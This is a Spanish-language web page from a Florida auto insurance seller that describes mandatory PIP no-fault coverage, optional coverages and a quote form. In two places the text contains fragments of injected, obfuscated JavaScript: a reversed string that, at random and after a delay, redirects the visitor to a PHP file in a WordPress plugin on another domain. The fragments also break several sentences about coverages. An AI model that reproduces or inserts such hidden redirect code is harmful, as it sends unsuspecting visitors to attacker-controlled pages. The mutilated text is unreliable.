Seguros Obligatorios En La Florida


Florida es un estado con seguro sin culpa. Si te lesionas en un accidente, tu seguro de auto pagará por tus costos médicos hasta los límites de tu póliza, independientemente de quien causó el accidente.

Seguros de auto de protección de lesiones personales (PIP)

Además de cubrir tu parte de cualquier gasto médico y de pérdidas en tus ingresos que resulten de un accidente de auto, tu seguro de protección de lesiones personales o PIP también cubrirá:

  • A tu hijo(a) y otros miembros de tu familia.
  • A tu hijo(a) (cuando viajan en un autobús escolar).
  • A ti (cuando estás caminando o en bicicleta y te involucras en un accidente de autos).
  • A los pasajeros que están en tu auto y que no tienen su seguro PIP y no poseen un auto.

NOTA: aún cuando las pólizas de coberturas para todo riesgo y por choques no son requeridas por la ley en Florida, si tu vehículo esta financiado, tu prestamista te requerirá que compres las dos si tu auto está siendo financiando.

Solicite su cotización express

Estamos listos para otorgarle su seguro, obténgalo en instantes con mínimos requisitos, al mejor costo.


Complete el sencillo formulario para obtener su información en instantes.

Seguros Opcionales en la Florida


Mientras que la ley en Florida te indica los montos mínimos de cobertura que debes comprar, siempre tienes la opción de comprar montos más altos de cobertura de seguros de protección de lesiones y de cobertura de responsabilidad civil.

) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andalismo."]Cobertura para todo riesgo comprensiva
Cobertura por choques

Esta cobertura pagará por los daños a tu auto debidos a accidentes.

Pagos Médicos

Paga los gastos razonables relacionados a tratamientos médicos para usted o un familiar residente en su domicilio debido a lesiones relacionadas al accidente.

Cobertura para conductores sin seguro o con seguro insuficiente

Esta cobertura pagará por los daños ocurridos en un accidente con conductores que no tienen seguro o cuentan con un seguro insuficiente.

Remolque y Mano de Obra

Proporciona servicio de remolque para el vehículo inhabilitado hasta los límites contratados en la póliza.

Asistencia en Carretera

Paga por servicios tales como remolque, servicio de batería, asistencia de neumáticos pinchados, envío de gasolina, aceite, líquido, y de agua, asistencia de cerrajero y asistencia en caso de colisión para el vehículo asegurado.

) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando el vehículo asegurado esta en reparación por una perdida de colisión o comprensiva y el asegurado ha incurrido en gastos deun vehículo de alquiler mientras el suyo estaba en reparación. "]Alquiler de Vehículo:

Este material es solo para fines informativos. Todas las declaraciones aquí redactadas, estan sujetas a las disposiciones, exclusiones, y condiciones de la poliza pertinente. Para una descripción detallada de las coberturas, terminos y condiciones referirse a la Poliza de Seguro. Las coberturas están sujetas a que se reúna todos los requisitos de suscripción de acuerdo a la disponibilidad del estado de la Florida.

CONSULTENOS SIN CARGO

Podemos ayudarte a encontrar el seguro ideal a tu necesidad, da el primer paso, y contáctanos.


Si tiene alguna duda o sugerencia, escríbanos al formulario que encontrará en esta sección, resolveremos de forma ágil sus solicitudes.

    Este material es solo para fines informativos. Todas las declaraciones aquí redactadas, estan sujetas a las disposiciones, exclusiones, y condiciones de la poliza pertinente. Para una descripción detallada de las coberturas, terminos y condiciones referirse a la Poliza de Seguro. Las coberturas están sujetas a que se reúna todos los requisitos de suscripción de acuerdo a la disponibilidad del estado de la Florida.